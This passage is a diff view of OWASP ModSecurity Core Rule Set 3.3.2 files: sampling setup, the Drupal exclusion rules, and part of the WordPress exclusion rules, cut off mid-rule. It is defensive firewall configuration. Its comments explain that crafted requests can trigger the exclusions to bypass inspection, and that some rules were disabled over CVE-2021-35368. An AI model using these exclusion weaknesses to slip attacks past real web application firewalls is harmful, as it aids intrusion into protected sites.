ver:'OWASP_CRS/3.3.2',\
chain"
SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \
"ctl:requestBodyProcessor=URLENCODED"
#
# -=[ Easing In / Sampling Percentage ]=-
#
# This is used to send only a limited percentage of requests into the Core
# Rule Set. The selection is based on TX.sampling_percentage and a pseudo
# random number calculated below.
#
# Use this to ease into a new Core Rules installation with an existing
# productive service.
#
# See
# https://www.netnea.com/cms/2016/04/26/easing-in-conditional-modsecurity-rule-execution-based-on-pseudo-random-numbers/
#
#
# Generate the pseudo random number
#
# ATTENTION: This is no cryptographically secure random number. It's just
# a cheap way to get some random number suitable for sampling.
#
# We take the entropy contained in the UNIQUE_ID. We hash that variable and
# take the first integer numbers out of it. Theoretically, it is possible
# there are no integers in a sha1 hash. We make sure we get two
# integer numbers by taking the last two digits from the DURATION counter
# (in microseconds).
# Finally, leading zeros are removed from the two-digit random number.
#
SecRule TX:sampling_percentage "@eq 100" \
"id:901400,\
phase:1,\
pass,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
skipAfter:END-SAMPLING"
SecRule UNIQUE_ID "@rx ^." \
"id:901410,\
phase:1,\
pass,\
t:sha1,t:hexEncode,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'TX.sampling_rnd100=%{MATCHED_VAR}'"
SecRule DURATION "@rx (..)$" \
"id:901420,\
phase:1,\
pass,\
capture,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'TX.sampling_rnd100=%{TX.sampling_rnd100}%{TX.1}'"
SecRule TX:sampling_rnd100 "@rx ^[a-f]*([0-9])[a-f]*([0-9])" \
"id:901430,\
phase:1,\
pass,\
capture,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'TX.sampling_rnd100=%{TX.1}%{TX.2}'"
SecRule TX:sampling_rnd100 "@rx ^0([0-9])" \
"id:901440,\
phase:1,\
pass,\
capture,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
setvar:'TX.sampling_rnd100=%{TX.1}'"
#
# Sampling decision
#
# If a request is allowed to pass without being checked by the CRS, there is no
# entry in the audit log (for performance reasons), but an error log entry is
# being written. If you want to disable the error log entry, then issue the
# following directive somewhere after the inclusion of the CRS
# (E.g., RESPONSE-999-EXCEPTIONS.conf).
#
# SecRuleUpdateActionById 901450 "nolog"
#
SecRule TX:sampling_rnd100 "!@lt %{tx.sampling_percentage}" \
"id:901450,\
phase:1,\
pass,\
log,\
noauditlog,\
msg:'Sampling: Disable the rule engine based on sampling_percentage %{TX.sampling_percentage} and random number %{TX.sampling_rnd100}',\
ctl:ruleEngine=Off,\
ver:'OWASP_CRS/3.3.2'"
SecMarker "END-SAMPLING"
#
# Configuration Plausibility Checks
#
# Make sure executing paranoia level is not lower than paranoia level
SecRule TX:executing_paranoia_level "@lt %{tx.paranoia_level}" \
"id:901500,\
phase:1,\
deny,\
status:500,\
t:none,\
log,\
msg:'Executing paranoia level configured is lower than the paranoia level itself. This is illegal. Blocking request. Aborting',\
ver:'OWASP_CRS/3.3.2'"

422
core/modsecurity/files/coreruleset/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf Normal file
View File

@@ -0,0 +1,422 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
# These exclusions remedy false positives in a default Drupal install.
# The exclusions are only active if crs_exclusions_drupal=1 is set.
# See rule 900130 in crs-setup.conf.example for instructions.
#
# [ POLICY ]
#
# Drupal is a complex application that is hard to secure with the CRS. This set
# of exclusion rules aims to sanitise the CRS in a way that allows a default
# Drupal setup to be installed and configured without much hassle as far as
# ModSecurity and the CRS are concerned.
#
# The exclusion rules are fairly straight forward in the sense that they
# disable CRS on a set of well-known parameter fields that are often the source
# of false positives / false alarms of the CRS. This includes namely the
# session cookie, the password fields and article/node bodies.
#
# This is based on two assumptions: - You have a basic trust in your
# authenticated users who are allowed to edit nodes. - Drupal allows html
# content in nodes and it protects your users from attacks via these fields.
#
# If you think these assumptions are wrong or if you would prefer a more
# careful/secure approach, you can disable the exclusion rules handling of said
# node body false positives. Do this by placing the following directive in
# RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.
#
# SecRuleRemoveById 9001200-9001299
#
# This will mean the CRS remain intact for the editing of node bodies.
#
# The exclusion rules in this file work without the need to define a Drupal
# installation path prefix. Instead they look at the URI from the end - or
# they use regular expressions when targeting dynamic URL. This is all not
# totally foolproof. In some cases, an advanced attacker might be able to
# doctor a request in a way that one of these exclusion rules is triggered
# and the request will bypass all further inspection despite not being a
# Drupal request at all. These exclusion rules could thus be leveraged to
# disable the CRS completely. This is why these rules are off by default.
#
# The CRS rules covered by this ruleset are the rules with Paranoia Level 1 and
# 2. If you chose to run Paranoia Level 3 or 4, you will be facing additional
# false positives which you need to handle yourself.
#
# This set of exclusion rules does not cover any additional Drupal modules
# outside of core.
#
# The exclusion rules are based on Drupal 8.1.10.
#
# And finally: This set of exclusion rules is in an experimental state. If you
# encounter false positives with the basic Drupal functionality and they are
# not covered by this rule file, then please report them. The aim is to be able
# to install and run Drupal core in a seamless manner protected by
# ModSecurity / CRS up to the paranoia level 2.
SecRule &TX:crs_exclusions_drupal|TX:crs_exclusions_drupal "@eq 0" \
"id:9001000,\
phase:1,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
skipAfter:END-DRUPAL-RULE-EXCLUSIONS"
SecRule &TX:crs_exclusions_drupal|TX:crs_exclusions_drupal "@eq 0" \
"id:9001001,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
skipAfter:END-DRUPAL-RULE-EXCLUSIONS"
# [ Table of Contents ]
#
# 9001100 Session Cookie
# 9001110 Password
# 9001120 FREE for use
# 9001130 FREE for use
# 9001140 Content and Descriptions
# 9001150 FREE for use
# 9001160 Form Token
# 9001170 Text Formats and Editors
# 9001180 WYSIWYG/CKEditor Assets and Upload
# 9001190 FREE for use
# 9001200 Content and Descriptions
#
# The rule id range from 9001200 to 9001999 is reserved for future
# use (Drupal plugins / modules).
# [ Session Cookie ]
#
# Giving the session cookie a dynamic name is most unfortunate
# from a ModSecurity perspective. The rule language does not allow
# us to disable rules in a granular way for individual cookies with
# dynamic names. So we need to disable rule causing false positives
# for all cookies and their names.
#
# Rule Exclusion Session Cookie: 942450 SQL Hex Encoding Identified
#
SecAction "id:9001100,\
phase:2,\
pass,\
nolog,\
ctl:ruleRemoveTargetById=942450;REQUEST_COOKIES_NAMES,\
ctl:ruleRemoveTargetById=942450;REQUEST_COOKIES,\
ver:'OWASP_CRS/3.3.2'"
#
# [ Password ]
#
# Disable the CRS completely for all occurrences of passwords.
#
SecRule REQUEST_FILENAME "@endsWith /core/install.php" \
"id:9001110,\
phase:2,\
pass,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:account[pass][pass1],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:account[pass][pass2],\
ver:'OWASP_CRS/3.3.2'"
SecRule REQUEST_FILENAME "@endsWith /user/login" \
"id:9001112,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass,\
ver:'OWASP_CRS/3.3.2'"
SecRule REQUEST_FILENAME "@endsWith /admin/people/create" \
"id:9001114,\
phase:2,\
pass,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass1],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass2],\
ver:'OWASP_CRS/3.3.2'"
SecRule REQUEST_FILENAME "@rx /user/[0-9]+/edit$" \
"id:9001116,\
phase:2,\
pass,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:current_pass,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass1],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass2],\
ver:'OWASP_CRS/3.3.2'"
#
# [ Admin Settings (general) ]
#
# Disable known false positives for various fields used on admin pages.
#
# Rule Exclusion: 920271 Invalid character in request on multiple fields/paths
# Rule Exclusion: 942430 Restricted SQL Character Anomaly Detection (args)
# Disabled completely for admin/config pages
# For the people/accounts page, we disable the CRS completely for a number of
# freeform text fields.
#
SecRule REQUEST_FILENAME "@contains /admin/config/" \
"id:9001122,\
phase:2,\
pass,\
nolog,\
ctl:ruleRemoveById=942430,\
ver:'OWASP_CRS/3.3.2'"
SecRule REQUEST_FILENAME "@endsWith /admin/config/people/accounts" \
"id:9001124,\
phase:2,\
pass,\
nolog,\
ctl:ruleRemoveById=920271,\
ctl:ruleRemoveById=942440,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_cancel_confirm_body,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_password_reset_body,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_register_admin_created_body,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_register_no_approval_required_body,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_register_pending_approval_body,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_status_activated_body,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_status_blocked_body,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_status_canceled_body,\
ver:'OWASP_CRS/3.3.2'"
SecRule REQUEST_FILENAME "@endsWith /admin/config/development/configuration/single/import" \
"id:9001126,\
phase:2,\
pass,\
nolog,\
ctl:ruleRemoveById=920271,\
ctl:ruleRemoveById=942440,\
ver:'OWASP_CRS/3.3.2'"
SecRule REQUEST_FILENAME "@endsWith /admin/config/development/maintenance" \
"id:9001128,\
phase:2,\
pass,\
nolog,\
ctl:ruleRemoveById=942440,\
ver:'OWASP_CRS/3.3.2'"
#
#
# [ Content and Descriptions ]
#
# Disable known false positives for field "ids[]".
#
# Rule Exclusion: 942130 SQL Injection Attack: SQL Tautology Detected
#
SecRule REQUEST_FILENAME "@endsWith /contextual/render" \
"id:9001140,\
phase:2,\
pass,\
nolog,\
ctl:ruleRemoveTargetById=942130;ARGS:ids[],\
ver:'OWASP_CRS/3.3.2'"
#
# [ Form Token / Build ID ]
#
# Rule Exclusion for form_build_id: 942440 SQL Comment Sequence Detected on ...
# Rule Exclusion for form_token: 942450 SQL Hex Encoding
# Rule Exclusion for form_build_id: 942450 SQL Hex Encoding
#
# This is applied site-wide.
#
SecAction "id:9001160,\
phase:2,\
pass,\
nolog,\
ctl:ruleRemoveTargetById=942440;ARGS:form_build_id,\
ctl:ruleRemoveTargetById=942450;ARGS:form_token,\
ctl:ruleRemoveTargetById=942450;ARGS:form_build_id,\
ver:'OWASP_CRS/3.3.2'"
#
# [ Text Formats and Editors ]
#
# Disable the CRS completely for two fields triggering many, many rules
#
# Rule Exclusion for two fields: 942440 SQL Comment Sequence Detected
#
SecRule REQUEST_FILENAME "@endsWith /admin/config/content/formats/manage/full_html" \
"id:9001170,\
phase:2,\
pass,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:editor[settings][toolbar][button_groups],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:filters[filter_html][settings][allowed_html],\
ver:'OWASP_CRS/3.3.2'"
#
# [ WYSIWYG/CKEditor Assets and Upload ]
#
# Disable the unnecessary requestBodyAccess and for binary uploads
# bigger than an arbitrary limit of 31486341 bytes.
#
# Extensive checks make sure these uploads are really legitimate.
#
# Rule 9001180 was commented out in 2021 in order to fight CVE-2021-35368.
#
#SecRule REQUEST_METHOD "@streq POST" \
# "id:9001180,\
# phase:1,\
# pass,\
# t:none,\
# nolog,\
# noauditlog,\
# ver:'OWASP_CRS/3.3.0',\
# chain"
# SecRule REQUEST_FILENAME "@rx /admin/content/assets/add/[a-z]+$" \
# "chain"
# SecRule REQUEST_COOKIES:/S?SESS[a-f0-9]+/ "@rx ^[a-zA-Z0-9_-]+" \
# "ctl:requestBodyAccess=Off"
# Rule 9001182 was commented out in 2021 in order to fight CVE-2021-35368.
#
#SecRule REQUEST_METHOD "@streq POST" \
# "id:9001182,\
# phase:1,\
# pass,\
# t:none,\
# nolog,\
# noauditlog,\
# ver:'OWASP_CRS/3.3.0',\
# chain"
# SecRule REQUEST_FILENAME "@rx /admin/content/assets/manage/[0-9]+$" \
# "chain"
# SecRule ARGS:destination "@streq admin/content/assets" \
# "chain"
# SecRule REQUEST_HEADERS:Content-Length "@gt 31486341" \
# "chain"
# SecRule REQUEST_COOKIES:/S?SESS[a-f0-9]+/ "@rx ^[a-zA-Z0-9_-]+" \
# "ctl:requestBodyAccess=Off"
# Rule 9001184 was commented out in 2021 in order to fight CVE-2021-35368.
#
#SecRule REQUEST_METHOD "@streq POST" \
# "id:9001184,\
# phase:1,\
# pass,\
# t:none,\
# nolog,\
# noauditlog,\
# ver:'OWASP_CRS/3.3.0',\
# chain"
# SecRule REQUEST_FILENAME "@rx /file/ajax/field_asset_[a-z0-9_]+/[ua]nd/0/form-[a-z0-9A-Z_-]+$" \
# "chain"
# SecRule REQUEST_HEADERS:Content-Length "@gt 31486341" \
# "chain"
# SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)multipart/form-data" \
# "chain"
# SecRule REQUEST_COOKIES:/S?SESS[a-f0-9]+/ "@rx ^[a-zA-Z0-9_-]+" \
# "ctl:requestBodyAccess=Off"
#
# [ Content and Descriptions ]
#
# Disable the CRS completely for node bodies and other free text fields.
# Other rules are disabled individually.
#
# Rule Exclusion for ARGS:uid[0][target_id]: 942410 SQL Injection Attack
# Rule Exclusion for ARGS:destination: 932110 RCE: Windows Command Inj.
#
SecRule REQUEST_FILENAME "@endsWith /node/add/article" \
"id:9001200,\
phase:2,\
pass,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\
ctl:ruleRemoveTargetById=942410;ARGS:uid[0][target_id],\
ver:'OWASP_CRS/3.3.2'"
SecRule REQUEST_FILENAME "@endsWith /node/add/page" \
"id:9001202,\
phase:2,\
pass,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\
ctl:ruleRemoveTargetById=942410;ARGS:uid[0][target_id],\
ver:'OWASP_CRS/3.3.2'"
SecRule REQUEST_FILENAME "@rx /node/[0-9]+/edit$" \
"id:9001204,\
phase:2,\
pass,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\
ctl:ruleRemoveTargetById=942410;ARGS:uid[0][target_id],\
ctl:ruleRemoveTargetById=932110;ARGS:destination,\
ver:'OWASP_CRS/3.3.2'"
SecRule REQUEST_FILENAME "@endsWith /block/add" \
"id:9001206,\
phase:2,\
pass,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\
ver:'OWASP_CRS/3.3.2'"
SecRule REQUEST_FILENAME "@endsWith /admin/structure/block/block-content/manage/basic" \
"id:9001208,\
phase:2,\
pass,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:description,\
ver:'OWASP_CRS/3.3.2'"
SecRule REQUEST_FILENAME "@rx /editor/filter_xss/(?:full|basic)_html$" \
"id:9001210,\
phase:2,\
pass,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:value,\
ver:'OWASP_CRS/3.3.2'"
SecRule REQUEST_FILENAME "@rx /user/[0-9]+/contact$" \
"id:9001212,\
phase:2,\
pass,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message[0][value],\
ver:'OWASP_CRS/3.3.2'"
SecRule REQUEST_FILENAME "@endsWith /admin/config/development/maintenance" \
"id:9001214,\
phase:2,\
pass,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:maintenance_mode_message,\
ver:'OWASP_CRS/3.3.2'"
SecRule REQUEST_FILENAME "@endsWith /admin/config/services/rss-publishing" \
"id:9001216,\
phase:2,\
pass,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:feed_description,\
ver:'OWASP_CRS/3.3.2'"
SecMarker "END-DRUPAL-RULE-EXCLUSIONS"

759
core/modsecurity/files/coreruleset/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf Normal file
View File

@@ -0,0 +1,759 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
# These exclusions remedy false positives in a default WordPress install.
# The exclusions are only active if crs_exclusions_wordpress=1 is set.
# See rule 900130 in crs-setup.conf.example for instructions.
#
# Note that the WordPress comment field itself is currently NOT excluded
# from checking. The reason is that malicious content is regularly being
# posted to WordPress comment forms, and there have been various cases
# of XSS and even RCE vulnerabilities exploited by WordPress comments.
SecRule &TX:crs_exclusions_wordpress|TX:crs_exclusions_wordpress "@eq 0" \
"id:9002000,\
phase:1,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
skipAfter:END-WORDPRESS"
SecRule &TX:crs_exclusions_wordpress|TX:crs_exclusions_wordpress "@eq 0" \
"id:9002001,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
skipAfter:END-WORDPRESS"
#
# -=[ WordPress Front-End ]=-
#
#
# [ Login form ]
#
# User login password
SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \
"id:9002100,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pwd,\
ver:'OWASP_CRS/3.3.2'"
# Reset password
SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \
"id:9002120,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule ARGS:action "@streq resetpass" \
"t:none,\
chain"
SecRule &ARGS:action "@eq 1" \
"t:none,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2"
#
# [ Comments ]
#
# Post comment
SecRule REQUEST_FILENAME "@endsWith /wp-comments-post.php" \
"id:9002130,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetById=931130;ARGS:url,\
ver:'OWASP_CRS/3.3.2'"
#
# [ Gutenberg Editor ]
# Used when a user (auto)saves a post/page with Gutenberg.
#
# Gutenberg
SecRule REQUEST_FILENAME "@rx /wp-json/wp/v[0-9]+/(?:posts|pages)" \
"id:9002140,\
phase:1,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:content,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:json.content,\
ver:'OWASP_CRS/3.3.2'"
# Gutenberg via rest_route for sites without pretty permalinks
SecRule REQUEST_FILENAME "@endsWith /index.php" \
"id:9002141,\
phase:1,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule &ARGS:rest_route "@eq 1" \
"t:none,\
nolog,\
chain"
SecRule ARGS:rest_route "@rx ^/wp/v[0-9]+/(?:posts|pages)" \
"t:none,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:content,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:json.content"
# Gutenberg upload image/media
SecRule REQUEST_FILENAME "@rx /wp-json/wp/v[0-9]+/media" \
"id:9002142,\
phase:1,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveById=200002,\
ctl:ruleRemoveById=200003,\
ver:'OWASP_CRS/3.3.2'"
# Gutenberg upload image/media via rest_route for sites without pretty permalinks
SecRule REQUEST_FILENAME "@endsWith /index.php" \
"id:9002143,\
phase:1,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule &ARGS:rest_route "@eq 1" \
"t:none,\
nolog,\
chain"
SecRule ARGS:rest_route "@rx ^/wp/v[0-9]+/media" \
"t:none,\
ctl:ruleRemoveById=200002,\
ctl:ruleRemoveById=200003"
#
# [ Live preview ]
# Used when an administrator customizes the site and previews the result
# as a normal user.
#
# Theme select
# Example: wp_customize=on&theme=twentyfifteen&customized=
# {"old_sidebars_widgets_data":{"wp_inactive_widgets":[],
# "sidebar-1":["search-2","recent-posts-2","recent-comments-2",
# "archives-2","categories-2","meta-2"]}}&nonce=XXX&
# customize_messenger_channel=preview-0
SecRule ARGS:wp_customize "@streq on" \
"id:9002150,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule &ARGS:action "@eq 0" \
"t:none,\
ctl:ruleRemoveTargetById=942200;ARGS:customized,\
ctl:ruleRemoveTargetById=942260;ARGS:customized,\
ctl:ruleRemoveTargetById=942300;ARGS:customized,\
ctl:ruleRemoveTargetById=942330;ARGS:customized,\
ctl:ruleRemoveTargetById=942340;ARGS:customized,\
ctl:ruleRemoveTargetById=942370;ARGS:customized,\
ctl:ruleRemoveTargetById=942430;ARGS:customized,\
ctl:ruleRemoveTargetById=942431;ARGS:customized,\
ctl:ruleRemoveTargetById=942460;ARGS:customized"
# Appearance -> Widgets -> Live Preview
SecRule ARGS:wp_customize "@streq on" \
"id:9002160,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule ARGS:action "@rx ^(?:|customize_save|update-widget)$" \
"t:none,\
chain"
SecRule &ARGS:action "@eq 1" \
"t:none,\
ctl:ruleRemoveTargetById=942200;ARGS:customized,\
ctl:ruleRemoveTargetById=942260;ARGS:customized,\
ctl:ruleRemoveTargetById=942300;ARGS:customized,\
ctl:ruleRemoveTargetById=942330;ARGS:customized,\
ctl:ruleRemoveTargetById=942340;ARGS:customized,\
ctl:ruleRemoveTargetById=942370;ARGS:customized,\
ctl:ruleRemoveTargetById=942430;ARGS:customized,\
ctl:ruleRemoveTargetById=942431;ARGS:customized,\
ctl:ruleRemoveTargetById=942460;ARGS:customized,\
ctl:ruleRemoveTargetById=920230;ARGS:partials,\
ctl:ruleRemoveTargetById=941320;ARGS:partials,\
ctl:ruleRemoveTargetById=942180;ARGS:partials,\
ctl:ruleRemoveTargetById=942200;ARGS:partials,\
ctl:ruleRemoveTargetById=942260;ARGS:partials,\
ctl:ruleRemoveTargetById=942330;ARGS:partials,\
ctl:ruleRemoveTargetById=942340;ARGS:partials,\
ctl:ruleRemoveTargetById=942370;ARGS:partials,\
ctl:ruleRemoveTargetById=942430;ARGS:partials,\
ctl:ruleRemoveTargetById=942431;ARGS:partials,\
ctl:ruleRemoveTargetById=942460;ARGS:partials"
# Self calls to wp-cron.php?doing_wp_cron=[timestamp]
# These requests may be missing Accept, Content-Length headers.
# This rule must run in phase:1.
SecRule REQUEST_FILENAME "@endsWith /wp-cron.php" \
"id:9002200,\
phase:1,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveById=920180,\
ctl:ruleRemoveById=920300,\
ver:'OWASP_CRS/3.3.2'"
#
# [ Cookies ]
# WP Session Manager
# Cookie: _wp_session=[hex]||[timestamp]||[timestamp]
# detected SQLi using libinjection with fingerprint 'n&1'
SecRule REQUEST_COOKIES:_wp_session "@rx ^[0-9a-f]+\|\|\d+\|\|\d+$" \
"id:9002300,\
phase:1,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule &REQUEST_COOKIES:_wp_session "@eq 1" \
"t:none,\
ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:_wp_session"
#
# -=[ WordPress Administration Back-End (wp-admin) ]=-
#
# Skip this section for performance unless /wp-admin/ is in filename
SecRule REQUEST_FILENAME "!@contains /wp-admin/" \
"id:9002400,\
phase:1,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
skipAfter:END-WORDPRESS-ADMIN"
SecRule REQUEST_FILENAME "!@contains /wp-admin/" \
"id:9002401,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
skipAfter:END-WORDPRESS-ADMIN"
#
# [ Installation ]
#
# WordPress installation: exclude database password
SecRule REQUEST_FILENAME "@endsWith /wp-admin/setup-config.php" \
"id:9002410,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule ARGS:step "@streq 2" \
"t:none,\
chain"
SecRule &ARGS:step "@eq 1" \
"t:none,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pwd"
# WordPress installation: exclude admin password
SecRule REQUEST_FILENAME "@endsWith /wp-admin/install.php" \
"id:9002420,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule ARGS:step "@streq 2" \
"t:none,\
chain"
SecRule &ARGS:step "@eq 1" \
"t:none,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:admin_password,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:admin_password2,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text"
#
# [ User management ]
#
# Edit logged-in user
SecRule REQUEST_FILENAME "@endsWith /wp-admin/profile.php" \
"id:9002520,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule ARGS:action "@streq update" \
"t:none,\
chain"
SecRule &ARGS:action "@eq 1" \
"t:none,\
ctl:ruleRemoveTargetById=931130;ARGS:url,\
ctl:ruleRemoveTargetById=931130;ARGS:facebook,\
ctl:ruleRemoveTargetById=931130;ARGS:instagram,\
ctl:ruleRemoveTargetById=931130;ARGS:linkedin,\
ctl:ruleRemoveTargetById=931130;ARGS:myspace,\
ctl:ruleRemoveTargetById=931130;ARGS:pinterest,\
ctl:ruleRemoveTargetById=931130;ARGS:soundcloud,\
ctl:ruleRemoveTargetById=931130;ARGS:tumblr,\
ctl:ruleRemoveTargetById=931130;ARGS:youtube,\
ctl:ruleRemoveTargetById=931130;ARGS:wikipedia,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2"
# Edit user
SecRule REQUEST_FILENAME "@endsWith /wp-admin/user-edit.php" \
"id:9002530,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule ARGS:action "@streq update" \
"t:none,\
chain"
SecRule &ARGS:action "@eq 1" \
"t:none,\
ctl:ruleRemoveTargetById=931130;ARGS:url,\
ctl:ruleRemoveTargetById=931130;ARGS:url,\
ctl:ruleRemoveTargetById=931130;ARGS:facebook,\
ctl:ruleRemoveTargetById=931130;ARGS:instagram,\
ctl:ruleRemoveTargetById=931130;ARGS:linkedin,\
ctl:ruleRemoveTargetById=931130;ARGS:myspace,\
ctl:ruleRemoveTargetById=931130;ARGS:pinterest,\
ctl:ruleRemoveTargetById=931130;ARGS:soundcloud,\
ctl:ruleRemoveTargetById=931130;ARGS:tumblr,\
ctl:ruleRemoveTargetById=931130;ARGS:youtube,\
ctl:ruleRemoveTargetById=931130;ARGS:wikipedia,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2"
# Create user
SecRule REQUEST_FILENAME "@endsWith /wp-admin/user-new.php" \
"id:9002540,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule ARGS:action "@streq createuser" \
"t:none,\
chain"
SecRule &ARGS:action "@eq 1" \
"t:none,\
ctl:ruleRemoveTargetById=931130;ARGS:url,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2"
#
# [ General exclusions ]
#
# _wp_http_referer and wp_http_referer are passed on a lot of wp-admin pages
SecAction \
"id:9002600,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetById=920230;ARGS:_wp_http_referer,\
ctl:ruleRemoveTargetById=931130;ARGS:_wp_http_referer,\
ctl:ruleRemoveTargetById=932150;ARGS:_wp_http_referer,\
ctl:ruleRemoveTargetById=941100;ARGS:_wp_http_referer,\
ctl:ruleRemoveTargetById=942130;ARGS:_wp_http_referer,\
ctl:ruleRemoveTargetById=942200;ARGS:_wp_http_referer,\
ctl:ruleRemoveTargetById=942260;ARGS:_wp_http_referer,\
ctl:ruleRemoveTargetById=942431;ARGS:_wp_http_referer,\
ctl:ruleRemoveTargetById=942440;ARGS:_wp_http_referer,\
ctl:ruleRemoveTargetById=920230;ARGS:wp_http_referer,\
ctl:ruleRemoveTargetById=931130;ARGS:wp_http_referer,\
ctl:ruleRemoveTargetById=932150;ARGS:wp_http_referer,\
ctl:ruleRemoveTargetById=941100;ARGS:wp_http_referer,\
ctl:ruleRemoveTargetById=942130;ARGS:wp_http_referer,\
